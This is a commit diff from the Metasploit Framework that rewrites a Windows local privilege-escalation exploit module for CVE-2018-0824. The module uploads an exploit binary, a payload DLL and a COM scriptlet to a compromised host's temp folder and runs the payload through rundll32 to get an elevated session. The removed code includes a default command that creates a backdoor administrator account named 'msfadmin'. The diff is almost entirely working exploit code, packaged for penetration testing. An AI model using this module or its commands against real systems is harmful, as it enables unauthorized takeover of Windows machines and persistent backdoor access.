Update stuff

2018-10-17 17:17:05 -05:00 · 2018-10-17 17:17:05 -05:00 · d2c013001d
parent 629f4c190d
commit d2c013001d
3 changed files with 151 additions and 94 deletions
--- a/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
+++ b/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
--- a/external/source/exploits/CVE-2018-0824/UnmarshalPwn.vcxproj
+++ b/external/source/exploits/CVE-2018-0824/UnmarshalPwn.vcxproj
@ -1,4 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8"?>
 <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
@ -29,7 +29,7 @@
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
+    <PlatformToolset>v120</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
@ -42,13 +42,13 @@
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
+    <PlatformToolset>v120</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
+    <PlatformToolset>v120</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
@ -138,6 +138,7 @@
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
--- a/modules/exploits/windows/local/unmarshal.rb
+++ b/modules/exploits/windows/local/unmarshal.rb
@ -2,10 +2,18 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
 class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
+  include Msf::Post::Common
  include Msf::Post::File
-  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
@ -30,105 +38,153 @@ class MetasploitModule < Msf::Exploit::Local
      'DisclosureDate' => 'Aug 05 2018',
      'Arch'           => [ARCH_X64],
      'SessionTypes'   => ['meterpreter'],
-      'License'        => MSF_LICENSE
+      'Platform'       => ['win'],
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
    ))

    register_options(
      [
-         OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']),
-         OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ])
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('SCRIPT_NAME',
+        [false, 'The filename to use for the COM script file (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload dll be used on the target host.', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
      ])
  end

-    def write_poc_to_target(rpoc, rpocname)
+  def setup
+    super
+    validate_active_host
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    @payload_name = "#{payload_name}.dll" unless payload_name.match(/\.dll$/i)
+    @script_name = "#{script_name}.sct" unless payload_name.match(/\.sct$/i)
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_path = "#{temp_path}\\#{payload_name}"
+    @exploit_path = "#{temp_path}\\#{exploit_name}"
+    @script_path = "#{temp_path}\\#{script_name}"
+    @payload_dll = generate_payload_dll
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    if file?(path)
+      print_status("#{path} already exists on the target. Deleting...")
      begin
-        print_warning("writing to %TEMP%")
-        temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-        write_sct_to_target(temppoc,rpoc)
+        file_rm(path)
+        print_status("Deleted #{path}")
+      rescue Rex::Post::Meterpreter::RequestError => e
+        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        print_error("Unable to delete #{path}")
      end
-
-    print_good("Persistent Script written to #{temppoc}")
-    temppoc
-   end
-
-    def write_sct_to_target(temppoc,rpoc)
-     fd = session.fs.file.new(temppoc, "w")
-     fd.write(rpoc)
-     fd.close
+    end
  end

-    def app_poc_on_target(append,rpocname)
-     appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-     fd = session.fs.file.new(appendpoc, "a")
-     fd.write(append)
-     fd.close
-   end
-
-    def create_sct_file(txt)
-     print_status("Reading Payload from file #{txt}")
-     ::IO.read(txt)
-   end
-
-    def write_exe_to_target(rexe, rexename)
-     begin
-       print_warning("writing to %TEMP%")
-       temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
-       write_file_to_target(temprexe,rexe)
-     end
-    print_good("Persistent Script written to #{temprexe}")
-    temprexe
-   end
-
-     def write_file_to_target(temprexe,rexe)
-      fd = session.fs.file.new(temprexe, "wb")
-      fd.write(rexe)
-      fd.close
-   end
-
-     def create_payload_from_file(exec)
-      print_status("Reading Payload from file #{exec}")
-      ::IO.read(exec)
-   end
-
-     def run
-      rexename =  Rex::Text.rand_text_alphanumeric(10) + ".exe"
-      print_status("exe name is: #{rexename}")
-      rpocname =  Rex::Text.rand_text_alphanumeric(10) + ".sct"
-      print_status("poc name is: #{rpocname}")
-      poccmd =  datastore['POCCMD']
-      cmdcheck = datastore['CMDCHECK']
-
-      rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
-      raw = create_payload_from_file rexe
-      script_on_target = write_exe_to_target(raw, rexename)
-      rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
-      rawsct = create_sct_file rpoc
-      poc_on_target = write_poc_to_target(rawsct, rpocname)
-
-      cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-      fd = session.fs.file.new(cmdpoc, "a")
-      fd.write(poccmd)
-      fd.close
-
-      rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
-      append = create_payload_from_file rpoc1
-      append_on_target = app_poc_on_target(append, rpocname)
-
-      print_status('Starting module...')
-      print_line('')
-
-      command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
-      print_status("Location of UnmarshalPwn.exe is: #{command}")
-      command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
-      print_status("Location of poc.sct is: #{command1}")
-
-      command += " "
-      command += "#{command1}"
-
-      print_status("Executing command : #{command}")
-      command_output = cmd_exec(command)
-      print_line(command_output)
-      print_line('')
-
+  def upload_exploit
+    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
+    upload_file(exploit_path, local_exploit_path)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
  end
+
+  def upload_payload
+    write_file(payload_path, payload_dll)
+    print_status("Payload (#{payload_dll.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+  end
+
+  def upload_script
+    vprint_status("Creating the sct file with payload #{payload_path}")
+    local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')
+    script_template_data = ::IO.read(local_script_template_path)
+    temp_path = payload_path
+    print_status("Payload path: #{temp_path}")
+    temp_path.gsub!('\\', '\\\\\\\\')
+    print_status("Payload path: #{temp_path}")
+    vprint_status("script_template_data.length =  #{script_template_data.length}")
+    command = 'cmd.exe /c rundll32.exe ' + payload_path.gsub("\\", "\\\\\\\\") + ',0'
+#    script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
+    script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
+    if script_data == nil
+      fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
+    end
+    vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
+    write_file(script_path, script_data)
+    vprint_status('Script uploaded successfully')
+  end
+
+  def exploit
+    print_status("exploit path is: #{exploit_path}")
+    print_status("payload path is: #{payload_path}")
+    print_status("script path is: #{script_path}")
+    begin
+      validate_active_host
+      validate_target
+      validate_remote_path(temp_path)
+      ensure_clean_destination(exploit_path)
+      ensure_clean_destination(payload_path)
+      ensure_clean_destination(script_path)
+      vprint_status("Uploading Payload to #{payload_path}")
+      upload_payload
+      vprint_status("Uploading Script to #{script_path}")
+      upload_script
+      vprint_status("Uploading Exploit to #{exploit_path}")
+      upload_exploit
+      vprint_status('Launching Exploit...')
+      command_output = cmd_exec(exploit_path + ' ' + script_path)
+      vprint_status(command_output)
+      print_good('Exploit completed, wait for elevated session')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_good('Exploit failed, cleaning up')
+      print_error(e.message)
+      ensure_clean_destination(exploit_path)
+      ensure_clean_destination(payload_path)
+      ensure_clean_destination(script_path)
+    end
+  end
+
+  attr_reader :exploit_name
+  attr_reader :payload_name
+  attr_reader :script_name
+  attr_reader :payload_dll
+  attr_reader :temp_path
+  attr_reader :exploit_path
+  attr_reader :payload_path
+  attr_reader :script_path
 end
+